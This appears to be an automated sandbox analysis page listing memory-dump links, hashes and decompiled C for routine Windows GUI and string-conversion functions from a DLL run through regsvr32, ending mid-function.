Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog3$FromStringTextWindow$FocusItemLengthMessageSend_strlen
String ID:
API String ID: 131936272-0
Opcode ID: 542c5cde77eb5880299717873fbc9372932c1b254756384ade0b2ccb2610273e
Instruction ID: 094891cc8803010f02c60fe69b3d3b19e6c2dcd2f8403b547d8a15b464370062
Opcode Fuzzy Hash: 542c5cde77eb5880299717873fbc9372932c1b254756384ade0b2ccb2610273e
Instruction Fuzzy Hash: 5D313B79900109ABEB24DFA0DC82BFE7379FF04355F504129F926AB1D2DB34AA05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100010CD Relevance: 7.6, APIs: 5, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E100010CD(void* __eax, void* __edx, short* _a4, int _a8) {
				int _v4;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				signed int _t17;
				char** _t21;
				char** _t22;
				void* _t23;
				int _t26;
				int _t30;
				void* _t33;
				short* _t38;
				void* _t39;

				_t23 = __edx;
				_t38 = _a4;
				_t21 = _t22;
				if(_t38 != 0) {
					_t26 = lstrlenW(_t38) + 1;
					_t30 = _t26 << 2;
					L100011CC(_t21, _t21, _t30,  &(_t21[1]), 0x80);
					_t39 = WideCharToMultiByte;
					_t17 = WideCharToMultiByte(_a8, 0, _t38, _t26,  *_t21, _t30, 0, 0);
					asm("sbb esi, esi");
					_t33 =  ~_t17 + 1;
					if(_t33 != 0) {
						_t17 = GetLastError();
						if(_t17 == 0x7a) {
							_v4 = WideCharToMultiByte(_a8, 0, _a4, _t26, 0, 0, 0, 0);
							L100011CC(_t21, _t21, _v4,  &(_t21[1]), 0x80);
							_t17 = WideCharToMultiByte(_a8, 0, _a4, _t26,  *_t21, _v4, 0, 0);
							asm("sbb esi, esi");
							_t33 =  ~_t17 + 1;
						}
						if(_t33 != 0) {
							_t17 = E10001005(_t22, _t23, _t39);
						}
					}
					return _t17;
				} else {
					 *_t21 =  *_t21 & _t38;
					return __eax;
				}
			}

0x100010cd
0x10002212
0x10002218
0x1000221a
0x1000222e
0x1000223a
0x1000223f
0x10002250
0x1000225b
0x10002261
0x10002263
0x10002264
0x10002266
0x1000226f
0x10002283
0x10002295
0x100022af
0x100022b5
0x100022b7
0x100022b7
0x100022ba
0x100022bc
0x100022bc
0x100022ba
0x00000000
0x1000221c
0x1000221c
0x00000000
0x1000221c

APIs

lstrlenW.KERNEL32(?), ref: 10002226
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000001,00000000,00000000), ref: 1000225B
GetLastError.KERNEL32(?,00000001,00000000,00000000), ref: 10002266
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000,?,00000001,00000000,00000000), ref: 10002281
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000000,?,00000001,00000000,00000000), ref: 100022AF

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: 2a3b8cb836da67e0ccb9ddea8f742ad8d8c87a6c19cb1d6ea04747123ffd58e7
Instruction ID: a391f8928b0f2ae8cbbebc98cfc85c77aed691913884041a6c09ebdd08697e0b
Opcode Fuzzy Hash: 2a3b8cb836da67e0ccb9ddea8f742ad8d8c87a6c19cb1d6ea04747123ffd58e7
Instruction Fuzzy Hash: AC11E932401274BFE7319A628C49EABBFECEF83BE0F404554FD8996015DA219C25C6F1

Uniqueness

Uniqueness Score: -1.00%

Function 10035656 Relevance: 7.6, APIs: 5, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E10035656(void* __ecx, void* __ebp, unsigned int _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t20;
				void* _t21;
				void* _t23;
				void* _t34;
				void* _t35;
				struct HWND__* _t36;
				void* _t37;

				_t37 = __ebp;
				_t29 = __ecx;
				_t35 = __ecx;
				if((E100177F8(__ecx) & 0x40000000) == 0) {
					_t29 = __ecx;
					_t34 = L10014BA7(__ecx);
				} else {
					_t34 = __ecx;
				}
				_t41 = _t34;
				if(_t34 == 0) {
					E1000A069(0, _t29, _t34, _t35, _t41);
				}
				_push(_t37);
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E1001795E(_t34);
					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t34 == _t35) {
						SendMessageA( *(_t34 + 0x20), 0x86, 0, 0);
					} else {
						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) | 0x00000200;
						SendMessageA( *(_t34 + 0x20), 0x86, 1, 0);
						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) & 0xfffffdff;
					}
				}
				_push(5);
				_push(GetDesktopWindow());
				while(1) {
					_t20 = GetWindow();
					_t36 = _t20;
					if(_t36 == 0) {
						break;
					}
					_t21 = L10034C53( *(_t34 + 0x20), _t36);
					__eflags = _t21;
					if(_t21 != 0) {
						SendMessageA(_t36, 0x36d, _a4, 0);
					}
					_push(2);
					_push(_t36);
				}
				return _t20;
			}

0x10035656
0x10035656
0x10035659
0x10035665
0x1003566b
0x10035672
0x10035667
0x10035667
0x10035667
0x10035676
0x10035678
0x1003567a
0x1003567a
0x10035684
0x1003568b
0x1003568f
0x100356a0
0x100356d1
0x100356aa
0x100356aa
0x100356bc
0x100356be
0x100356be
0x100356a0
0x100356d3
0x100356e1
0x10035702
0x10035702
0x10035704
0x10035708
0x00000000
0x00000000
0x100356e8
0x100356ed
0x100356ef
0x100356fd
0x100356fd
0x100356ff
0x10035701
0x10035701
0x1003570e

APIs

Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803

SendMessageA.USER32 ref: 100356BC
SendMessageA.USER32 ref: 100356D1
GetDesktopWindow.USER32 ref: 100356D5
SendMessageA.USER32 ref: 100356FD
GetWindow.USER32(00000000), ref: 10035702

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSendWindow$DesktopLong
String ID:
API String ID: 2272707703-0
Opcode ID: 52c92ffb03a877432c12eaf483e9684fa833189396604cfc91ae397ea414aa04
Instruction ID: 3d98941bdb409902b6d145e6d0440896241f45a2040b1dcf033ce4d8e4ed85b0
Opcode Fuzzy Hash: 52c92ffb03a877432c12eaf483e9684fa833189396604cfc91ae397ea414aa04
Instruction Fuzzy Hash: 7311E232200B166FE222DA208C83F6F7699EB45797F414118F5811F4F1CF63EC408AA4

Uniqueness

Uniqueness Score: -1.00%

Function 10035E3A Relevance: 7.6, APIs: 5, Instructions: 66
windowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E10035E3A(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int _t23;
				int _t29;
				unsigned int _t49;
				void* _t52;
				void* _t55;
				intOrPtr _t56;
				void* _t57;
				signed int _t58;
				void* _t60;

				_t53 = __edi;
				_t52 = __edx;
				_t43 = __ebx;
				_t58 = _t60 - 0x90;
				_t23 =  *0x100b9e70; // 0x6fb3f782
				 *(_t58 + 0x8c) = _t23 ^ _t58;
				_push(_t55);
				 *((intOrPtr*)(_t58 - 0x80)) = __ecx;
				 *(_t58 - 0x7c) =  *(_t58 + 0x98);
				_t56 =  *((intOrPtr*)(E1001E302(__ebx, __edi, _t55, __eflags) + 4));
				if(_t56 != 0 &&  *(_t58 + 0x9c) != 0) {
					_t49 =  *(_t58 + 0x9c) >> 0x10;
					if(_t49 != 0) {
						_t29 =  *(_t56 + 0x90) & 0x0000ffff;
						if( *(_t58 + 0x9c) == _t29 && _t49 ==  *(_t56 + 0x92)) {
							_push(__ebx);
							_push(__edi);
							GlobalGetAtomNameA(_t29, _t58 - 0x78, 0x103);
							GlobalAddAtomA(_t58 - 0x78);
							GlobalGetAtomNameA( *(_t56 + 0x92) & 0x0000ffff, _t58 - 0x78, 0x103);
							GlobalAddAtomA(_t58 - 0x78);
							SendMessageA( *(_t58 - 0x7c), 0x3e4,  *( *((intOrPtr*)(_t58 - 0x80)) + 0x20), ( *(_t56 + 0x92) & 0x0000ffff) << 0x00000010 |  *(_t56 + 0x90) & 0x0000ffff);
							_pop(_t53);
							_pop(_t43);
						}
					}
				}
				_pop(_t57);
				return E1004763E(0, _t43,  *(_t58 + 0x8c) ^ _t58, _t52, _t53, _t57);
			}

0x10035e3a
0x10035e3a
0x10035e3a
0x10035e3b
0x10035e48
0x10035e4f
0x10035e5b
0x10035e5c
0x10035e5f
0x10035e67
0x10035e6c
0x10035e86
0x10035e8c
0x10035e8e
0x10035e9c
0x10035ea7
0x10035ea8
0x10035eb9
0x10035ec5
0x10035ed8
0x10035ede
0x10035f02
0x10035f08
0x10035f09
0x10035f09
0x10035e9c
0x10035e8c
0x10035f14
0x10035f21

APIs

GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 10035EB9
GlobalAddAtomA.KERNEL32(?), ref: 10035EC5
GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 10035ED8
GlobalAddAtomA.KERNEL32(?), ref: 10035EDE
SendMessageA.USER32 ref: 10035F02

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: AtomGlobal$Name$MessageSend
String ID:
API String ID: 1515195355-0
Opcode ID: 25b75d531d4a76369cd37772913bff965d773d12cf12d742e22f3eaf2c4a1cd6
Instruction ID: 5be1171fdf3591e7c986fb132ddb1d6712cc4fbab815219dffaaa8beb173d6a2
Opcode Fuzzy Hash: 25b75d531d4a76369cd37772913bff965d773d12cf12d742e22f3eaf2c4a1cd6
Instruction Fuzzy Hash: BD212F719005189EEB30DFB9CC45BEEB7F8FB08701F11451AE99AD7192E774A944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1003E51C Relevance: 7.6, APIs: 5, Instructions: 59
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1003E51C(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t24;
				unsigned int _t34;
				void* _t46;

				_t46 = __ecx;
				if(IsWindow( *(__ecx + 0x20)) == 0) {
					 *(_t46 + 0xac) = _a4;
					 *(_t46 + 0xb0) = _a8;
					 *(_t46 + 0xa4) = _a12;
					_t24 = _a16;
					 *(_t46 + 0xa8) = _t24;
					return _t24;
				}
				SendMessageA( *(_t46 + 0x20), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t46 + 0x20), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				if( *0x100b9b10 >= 0x60000) {
					_t34 = SendMessageA( *(_t46 + 0x20), 0x43a, 0, 0);
					 *(_t46 + 0xac) = _t34 & 0x0000ffff;
					 *(_t46 + 0xb0) = _t34 >> 0x10;
				}
				return InvalidateRect( *(_t46 + 0x20), 0, 1);
			}

0x1003e520
0x1003e52d
0x1003e5a8
0x1003e5b1
0x1003e5ba
0x1003e5c0
0x1003e5c3
0x00000000
0x1003e5c3
0x1003e550
0x1003e569
0x1003e575
0x1003e581
0x1003e589
0x1003e58f
0x1003e58f
0x00000000

APIs

IsWindow.USER32(?), ref: 1003E525
SendMessageA.USER32 ref: 1003E550
SendMessageA.USER32 ref: 1003E569
SendMessageA.USER32 ref: 1003E581
InvalidateRect.USER32(?,00000000,00000001), ref: 1003E59B

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$InvalidateRectWindow
String ID:
API String ID: 3225880595-0
Opcode ID: eba55d63198051db967d26b7d17f113c89d239f5d41592b7936e75cdc709e4af
Instruction ID: cc940a1e5372195ee0a3d138bca3cef25a0481447a39ca6b3c91d1d4f11775ec
Opcode Fuzzy Hash: eba55d63198051db967d26b7d17f113c89d239f5d41592b7936e75cdc709e4af
Instruction Fuzzy Hash: 93111CB1210718AFF7108F29CC80AB7B7E8FB44745F00492AF99AC6160E7B0AC50DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001FC86 Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1001FC86(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x100bdc90; // 0x60
					_t12 =  *0x100bdc94; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						L1000CB4B(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

0x1001fc89
0x1001fc8c
0x1001fc91
0x1001fcdd
0x1001fce3
0x00000000
0x1001fc93
0x1001fc9c
0x1001fca1
0x1001fcd7
0x1001fcd9
0x1001fce8
0x1001fce8
0x1001fcfa
0x1001fd02
0x1001fd08
0x1001fd0a
0x1001fca8
0x1001fcaa
0x1001fcae
0x1001fcb6
0x1001fcbd
0x1001fcc0
0x1001fcc0
0x1001fca1
0x1001fd11

APIs

GetMapMode.GDI32(?), ref: 1001FC96
GetDeviceCaps.GDI32(?,00000058), ref: 1001FCD0
GetDeviceCaps.GDI32(?,0000005A), ref: 1001FCD9

Part of subcall function 1000CB4B: MulDiv.KERNEL32 ref: 1000CB8B
Part of subcall function 1000CB4B: MulDiv.KERNEL32 ref: 1000CBA8

MulDiv.KERNEL32 ref: 1001FCFD
MulDiv.KERNEL32 ref: 1001FD08

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: c5bfe97383b21167ecbfd5733dc43ed74f11ef28515f61892ee91f832a9f131c
Instruction ID: 2dda1ed18a893bb91b8f729ca021f7bbaa3251bb817cbd0e8215410ef64a26ea
Opcode Fuzzy Hash: c5bfe97383b21167ecbfd5733dc43ed74f11ef28515f61892ee91f832a9f131c
Instruction Fuzzy Hash: 3B11C235600A14AFDB21AF55CD84C2EBBE9FF99750B11041AF9865B361CB71EC40DF80

Uniqueness

Uniqueness Score: -1.00%

Function 1001FD14 Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1001FD14(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x100bdc90; // 0x60
					_t12 =  *0x100bdc94; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						L1000CAE2(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

0x1001fd17
0x1001fd1a
0x1001fd1f
0x1001fd6b
0x1001fd71
0x00000000
0x1001fd21
0x1001fd2a
0x1001fd2f
0x1001fd65
0x1001fd67
0x1001fd76
0x1001fd76
0x1001fd88
0x1001fd91
0x1001fd96
0x1001fd98
0x1001fd36
0x1001fd38
0x1001fd3c
0x1001fd44
0x1001fd4b
0x1001fd4e
0x1001fd4e
0x1001fd2f
0x1001fd9f

APIs

GetMapMode.GDI32(?), ref: 1001FD24
GetDeviceCaps.GDI32(?,00000058), ref: 1001FD5E
GetDeviceCaps.GDI32(?,0000005A), ref: 1001FD67

Part of subcall function 1000CAE2: MulDiv.KERNEL32 ref: 1000CB22
Part of subcall function 1000CAE2: MulDiv.KERNEL32 ref: 1000CB3F

MulDiv.KERNEL32 ref: 1001FD8B
MulDiv.KERNEL32 ref: 1001FD96

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: a09eb238ece8f688eb0d6614b3b950c93c589ed83f5e5c5479ebd71d61082c37
Instruction ID: 1b1f7cd94bb43c6985f4debd3ae4dface2fa8dd3e1b3935f9df79c40de1ecee6
Opcode Fuzzy Hash: a09eb238ece8f688eb0d6614b3b950c93c589ed83f5e5c5479ebd71d61082c37
Instruction Fuzzy Hash: C011AC35600A14AFEB21AF65CC84C2EBBBAEF99754B114419F9869B360DB71EC41DB80

Uniqueness

Uniqueness Score: -1.00%

Function 100219F5 Relevance: 7.6, APIs: 5, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E100219F5(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				void* _t26;
				int _t27;
				CHAR* _t28;
				signed int _t29;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x100b9e70; // 0x6fb3f782
				_v8 = _t9 ^ _t29;
				_t21 = _a4;
				_t32 = _t21;
				_t28 = _a8;
				if(_t21 == 0) {
					L1:
					E1000A069(_t21, _t22, _t26, _t28, _t32);
				}
				if(_t28 == 0) {
					goto L1;
				}
				_t27 = lstrlenA(_t28);
				_v264 = 0;
				E10049170(_t27,  &_v263, 0, 0xff);
				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
					_t16 = SetWindowTextA(_t21, _t28);
				}
				return E1004763E(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
			}

0x100219f5
0x100219f5
0x100219fe
0x10021a05
0x10021a09
0x10021a0c
0x10021a0f
0x10021a13
0x10021a15
0x10021a15
0x10021a15
0x10021a1c
0x00000000
0x00000000
0x10021a2a
0x10021a35
0x10021a3c
0x10021a4b
0x10021a74
0x10021a74
0x10021a88

APIs

lstrlenA.KERNEL32(1001F17A,?,?,00000000), ref: 10021A1F
_memset.LIBCMT ref: 10021A3C
GetWindowTextA.USER32(?,00000000,00000100), ref: 10021A56
lstrcmpA.KERNEL32(00000000,1001F17A), ref: 10021A68
SetWindowTextA.USER32(?,1001F17A), ref: 10021A74

Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: f37ae391a2a477733342357afa6a883f85541bd245fc17c728e52e5f3896c037
Instruction ID: 499d7301ef98d5b65c02851671055dc1f9410084b471d0e54be72e61f8d27827
Opcode Fuzzy Hash: f37ae391a2a477733342357afa6a883f85541bd245fc17c728e52e5f3896c037
Instruction Fuzzy Hash: FA01D6796012186BEB00DF74DDC4BDF73ACEB15380F4100A1F946D3141DA749E8487A1

Uniqueness

Uniqueness Score: -1.00%

Function 100354D7 Relevance: 7.5, APIs: 5, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E100354D7(void* __ecx) {
				struct tagMSG _v28;
				char _v52;
				intOrPtr _v64;
				void* __ebx;
				int __edi;
				void* __esi;
				int __ebp;
				void* _t13;
				void* _t19;
				void* _t21;
				void* _t22;
				intOrPtr _t23;
				void* _t24;
				void* _t26;

				_t22 = __ecx;
				_t26 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x68)) == 0) {
					L11:
					return _t13;
				} else {
					__edi = 0x367;
					__eax =  &_v28;
					__eax = PeekMessageA( &_v28,  *(__esi + 0x20), 0x367, 0x367, 3);
					__ebx = PostMessageA;
					if(__eax == 0) {
						__eax = PostMessageA( *(__esi + 0x20), 0x367, 0, 0);
					}
					if(GetCapture() ==  *(__esi + 0x20)) {
						__eax = ReleaseCapture();
					}
					__ecx = __esi;
					__eax = L10014BA7(__esi);
					if(__eax != __ebp) {
						 *(__esi + 0x68) = __ebp;
						 *(__eax + 0x68) = __ebp;
						__eax = PostMessageA( *(__esi + 0x20), 0x36a, __ebp, __ebp);
						goto L11;
					} else {
						_push(0);
						_push(_t22);
						_v52 = 0x100b8618;
						L10048E48( &_v52, 0x100aff30);
						asm("int3");
